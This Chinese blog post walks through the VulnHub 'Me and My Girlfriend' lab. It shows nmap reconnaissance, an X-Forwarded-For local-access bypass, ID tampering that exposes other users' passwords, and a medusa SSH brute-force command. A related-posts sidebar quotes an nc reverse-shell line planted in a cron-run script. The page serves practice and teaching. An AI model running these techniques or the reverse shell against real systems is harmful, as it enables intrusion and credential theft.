Me and My Girlfriend Vlunhub实践

最新推荐文章于 2024-01-03 21:20:29 发布
最新推荐文章于 2024-01-03 21:20:29 发布
阅读量503 收藏 1
点赞数
分类专栏: 实验
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43202965/article/details/104495672
版权

场景:
kali渗透机器
Me and My Girlfriend 目标机器
网络:
均使用NAT(不把目标机器视为内网机器,固均使用nat网络)
使用VMware加载

Tip:使用kali进行ifconfig查看NAT网段(10.10.10.0/24)
在这里插入图片描述一、目标主机信息收集:
1. 确定目标主机IP
使用kali的nmap对网段进行扫描
命令:nmap 10.10.10.0/24 -sn --exclude 10.10.10.128
参数讲解:
–exclude(设置扫描目标的参数):后面跟随的主机或网段不在扫描范围内
-sn(与主机发现的相关参数[注意参数大小写,不能混淆大小写]):Ping Scan,只进行主机发现,不进行端口扫描
确定目标主机IP为10.10.10.143
在这里插入图片描述2.kali使用nmap对目标进行端口扫描,并确定端口服务版本
命令:nmap 10.10.10.143 -sN -sV -O -p 0-65535
参数讲解:
-sN(常用端口扫描方法参数):使用TCP Null私密扫描的方式进行TCP端口扫描
-sV(版本探测相关参数):指定Nmap进行端口服务版本侦测
-O:进行对目标使用的操作系统进行识别
-p(端口参数):设定扫描端口
在这里插入图片描述得知目标开启22端口,以及80端口,22端口为ssh服务且版本为OpenSSH6.6. 1p1
80端口运行http服务且版本为Apache httpd 2.4.7 (ubuntu)
系统为Linux系统由上述信息可以推测目标操作系统为ubuntu系统
到此信息对主机信息收集告一段落

二、对目标服务进行渗透
1.对80端口服务进行渗透
使用浏览器访问目标主机(只有一串英文:Who are you? Hacker? Sorry This Site Can Only Be Accessed local!),给的信息就是,只能站点本地进行访问(产生思路:能否在包中添加XFF)
在这里插入图片描述进行目录探测
在这里插入图片描述访问robots.txt,看看里头还有点啥(发现有个heyhoo.txt)
在这里插入图片描述访问一下heyhoo.txt 文件,理解了一下:你现在需要的是侦察,攻击并得到目标的shell
在这里插入图片描述访问config,发现有一个config.php文件,点进去看看
在这里插入图片描述Config.php,空界面,配置文件一般才命名为config文件
在这里插入图片描述访问misc,发现一个process.php文件,访问,也是个空界面
在这里插入图片描述在这里插入图片描述之后访问剩下的目录,大都是如下图的内容,要不就是没啥用的
在这里插入图片描述按照刚开始看到这个标识时的思路
在这里插入图片描述
使用burp进行尝试
Tips:设定Intercept Client Requests,只抓取10.10.10.143这个域名的数据包,避免其他数据包也被抓取
在这里插入图片描述首先将访问10.10.10.143的数据发送到repeater模块,手动添加X-Forwarded-for:127.0.0.1
进行尝试,添加完成之后,点击Go,返回是个302(网页跳转),估计是有戏了。
在这里插入图片描述配置Match and Replace(在请求头处,添加X-Forwarded-for:127.0.0.1)
在这里插入图片描述302跳转访问得到的是/?page=index这个界面
在这里插入图片描述点击Login,是个登陆界面(产生思路:SQL注入,弱口令),点击Register,是个注册页面
在这里插入图片描述在这里插入图片描述试了一下弱口令,无果(SQL注入测试先放着)
在这里插入图片描述那就试试注册一个吧
在这里插入图片描述注册完成,之后登陆一下试试,登完之后看到连接10.10.10.143/index.php?page=dashboard&user_id=13
(产生思路:user_id=13,可能存在SQL注入,或者存在越权访问,前面还有12个账号)
在这里插入图片描述点击Profile,看看是啥,是个修改账号密码的地方。
在这里插入图片描述可以直接看到密码,或者将type=”password”中的password改为text直接查看密码(产生思路:如果存在越权漏洞的话,那就能直接查看别人的账号密码了),
在这里插入图片描述试试将id=13改为id=1,返回其他用户信息
在这里插入图片描述不用修改type类型,可以直接看到密码,这么多个id,应该有个是管理员的账号
就只有前五个id有账号密码,将账号密码拿出来(产生思路:web获取到这些账号的话,应该已经就差不多了,还有22端口没有测试,拿这些账号去登一登,看看能不能通过,ssh直接连上)将账号和密码分为两个txt,一个为username.txt另一个为password.txt,为ssh爆破做准备
在这里插入图片描述2.对22端口服务进行渗透
使用kali中的medusa进行ssh爆破
命令如下:
medusa -P Desktop/password.txt -M ssh -U Desktop/username.txt -h 10.10.10.143 -O Desktop/result1.txt
参数讲解:
-P:指定爆破使用的密码
-U:指定爆破时使用的账号
-O:指定爆破结果输出到指定的文件中
-M:指定爆破模块名称(后面跟ssh,就是对ssh进行爆破)
在这里插入图片描述在这里插入图片描述得到ssh连接的账号:alice密码:4lic3
使用Xshell连接上
在这里插入图片描述使用ls -la查看文件,看到一个my_secret的文件夹,估计有好东西,打开文件夹,查看文件夹中的文件,找到一个flag1.txt,查看flag1,得到第一个flag
在这里插入图片描述

TimorNuLi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vlunhub靶机一Kioptrix
willow_liang的博客
01-29 1169
Kioptrix Level 1 (#1) 1.查找靶机ip地址 1.使用nbtscan查找
靶机系列测试 Me and My Girlfriend 11
08-03
介绍2.1 靶机介绍描述说明there are 2 flag filesWeb Application | Enumeration | Privilege Es
靶机渗透一 me and my girlfriend
m0_62642153的博客
05-10 111
me and my girlfiend
vulnhub Me-and-My-Girlfriend-1
qq_46266956的博客
07-14 1164
web安全
vlunhub-Lampiao靶机通关(超详细)
最新发布
weixin_53730939的博客
01-03 548
vlunhub-Lampiao靶机通关(超详细)
1-Vlunhub--GIGACHAD
weixin_45873667的博客
06-08 429
前言:小菜鸟在努力 也是学渗透不久,慢慢了解深入,坚持每天能够弄明白一个靶机! Vlunhub–GIGACHAD 首先因为虚拟机无法分配IP需要我们手动 配置网卡: 将虚拟机打开: 按e进入编辑模式, 这里显示的网卡是ens33 修改 网卡:vi /etc/network/interfaces 将网络切换为nat模式,获得IP:192.168.159.155 配置好之后重新启动 开始复现: nmap -sn -vv -n -PE 192.168.159.0/24 --min-rate=2000 -s
vlunhub系列之breach靶机
hanjinming110的博客
08-11 403
cat shell.txt nc -e /bin/bash 192.168.110.22 5555 将其成功的写入到这个文件中,我们使用/usr/bin/tee目录,将这个文件写入到/usr/share/cleanup/tiduup.sh中。cat /usr/share/cleanup/tidyup.sh nc -e /bin/bash 192.168.110.22 5555 成功的将脚本写入到找个文件中,等待可执行脚本的运行。
Does GPT-4 Know Me Better Than My Girlfriend_.pdf
06-30
在探讨“GPT-4是否比我女朋友更了解我”这一话题时,我们触及了人工智能(AI)在理解和预测人类个性方面的能力。这个实验基于作者Dan Shipper的个人尝试,他利用GPT-4来模拟他的行为,并通过他在线上发表的内容和...
我的女友-my girlfriend.docx
02-17
我的女友-my girlfriend.docx
Robots-Stole-My-Girlfriend
07-02
可能与git clone git@github.com:MaTachi/Robots-Stole-My-Girlfriend.git 。 打开Eclipse。 将项目导入 Eclipse。 编译项目并运行它。地图编辑器地点可以在以下 URL 上找到地图编辑器: : 如何在 RSMG 中使用地图...
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
python-girlfriend-mood-master
12-07
标题“python-girlfriend-mood-master”暗示了这个项目可能与使用Python编程语言来管理或分析女朋友情绪有关。在IT行业中,这可能是一个个人项目,利用数据科学和机器学习技术来理解、预测或改善情侣间的互动。然而...
(全网究极无敌详细)vlunhub靶机渗透:HACKME2!
m0_70065235的博客
10-14 203
(究极无敌详细小白一看就会)hackme2靶机渗透报告
Vulnhub靶机实战-Me-and-My-Girlfriend
黑白的博客
01-10 519
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.239.6 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22 访问80 http://192.168.239.6 Who are you? Hacker? Sorry This Site Can Only Be Accessed loc
VulnHub靶场LupinOne
I夜白
02-01 4982
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息收集 信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重
[翻译]Looking Back at Postgres,Postgres 过往
weixin_34362790的博客
03-05 1461
2019独角兽企业重金招聘Python工程师标准>>> ...
vlunhub之Nagini(详细过程)
鲨鱼辣椒的博客
06-02 2041
horcrux_{MzogU2x5dGhFcmlOJ3MgTG9jS0VldCBkRXN0cm9ZZUQgYlkgUm9O}
vlunhub之tomato
鲨鱼辣椒的博客
05-31 356
目录 信息搜集 扫描网段确定主机IP地址 ​扫描该IP地址开放端口以及服务 ​发现漏洞 利用IP地址登录 ​尝试扫描出的端口 爆破网站目录 发现敏感文件泄露 利用漏洞 尝试getsell 利用php反弹shell 权限提升 在该目录下开启http服务 在getshell里下载该文件 信息搜集 扫描网段确定主机IP地址 扫描该IP地址开放端口以及服务 nmap -A -p- 192.168.179.128 发现漏洞 利用IP地址登录 尝试扫描出的端口 只有88
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)
rang的博客
08-19 2325
文章目录靶场环境主机发现利用nmap 进行二层扫描利用arp-scan扫描探测文件包含利用远程文件包含 执行木马通过 LFISuite自动化工具 利用文件包含漏洞暴力破解文件上传SSH弱口令# payload反弹# 任意密码修改# 添加代理# 远程代码执行# 内网探测 #个人总结 靶场环境 攻击机:kali(192.168.1.100) 目标机:Moriarty Corp(192.168.1.105) 内网(172.17.0.0/24) 这里用vmware搭建靶场扫描不到目标,改用VM_VirtualBo
I cry whenever I have an argument with my girlfriend, can you give me some advice?
09-16
### 回答1: 我建议你和你女友多沟通,尽量用理性的话语让彼此能够理解对方,这样可以减少争吵。同时,你也可以尝试去做一些让你感到开心的事情,比如做运动、聆听音乐、看电影等等,让自己释放压力,有助于你更好地处理情绪,以免发生争吵。 ### 回答2: 当我和女朋友吵架时,我总是会哭,你能给我一些建议吗? 吵架是正常的情侣关系中存在的一种压力释放方式。每个人都有情绪和不同的处理方式,所以你哭泣并不奇怪。然而,如果这种哭泣对你来说变得过于频繁或困扰了你的心情,那么我可以给你一些建议来帮助你处理这种情况。 首先,要学会控制情绪。在争吵时情绪激动是正常的,但你可以通过深呼吸和放慢呼吸来帮助你自我平静。尝试分散注意力,深呼吸几次然后数到十来让自己冷静下来。 其次,沟通是关键。在争吵之前,尝试与女朋友坦诚地交流。表达你的感受和需求,并试着倾听她的观点。善于沟通可以帮助你们更好地理解对方的想法和感受。 另外,要学会控制自己的情绪。吵架时,尽量避免说出伤害对方的话语。冷静地表达你的观点,同时尊重对方的感受。要记住,与女朋友的吵架并不意味着你们不相爱,只是情侣之间的碰撞和摩擦。 最后,重要的是学会处理冲突。冷静下来后,回顾争吵的原因,尝试找出解决问题的方法。倾听对方的意见,并寻求达成共识的途径。如果你觉得自己无法克制情绪或解决问题,考虑寻求专业帮助,如咨询师或关系辅导员。 在一段关系中吵架是正常的,但重要的是如何处理和解决冲突。掌握情绪管理和有效沟通的技巧可以帮助你们建立更健康和稳定的关系。记住,爱是需要努力和理解的,而吵架并不代表你们的爱情会受到损害。 ### 回答3: 当我和女朋友吵架时,我总是会哭,你能给我一些建议吗? 面对与女朋友的争吵,每个人的情况和个性都不尽相同,但以下是一些建议,或许能帮助你更好地处理这种情况。 首先,了解自己的情绪并接受它。哭泣可能是你面对冲突和争吵时表达情感的一种方式。这并不一定是坏事,但了解自己为什么会哭泣是很重要的。这有助于你更好地控制情绪,并找到更健康的方式来表达自己。 其次,尽量保持冷静和理性。在争吵期间尽量冷静下来,掌控自己的情绪。有时当我们过于情绪化时,可能会说出一些我们后悔的话,甚至伤害到彼此。尝试放慢呼吸,站在对方的角度思考问题,并冷静地表达自己的观点。 第三,采取积极的沟通方式。在解决冲突时,有一种积极、有效的沟通方式被广泛认可。这意味着倾听对方的观点,不要打断或争辩。尝试寻找共同点和解决问题的方法,而不是陷入相互指责和争吵的漩涡。 最后,寻求外部支持。如果你发现自己在每次争吵后都哭泣,可能需要寻求一些外部支持,比如寻求心理咨询师或情感辅导。他们能够帮助你理解自己的情绪,找到更健康的应对方式,并提供具体的指导。 总之,在争吵中哭泣并不意味着你是一个软弱的人,只是一种表达情感的方式。通过了解自己的情绪、保持冷静和理性、积极沟通以及寻求外部支持,你将能够更好地处理与女友之间的争吵。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值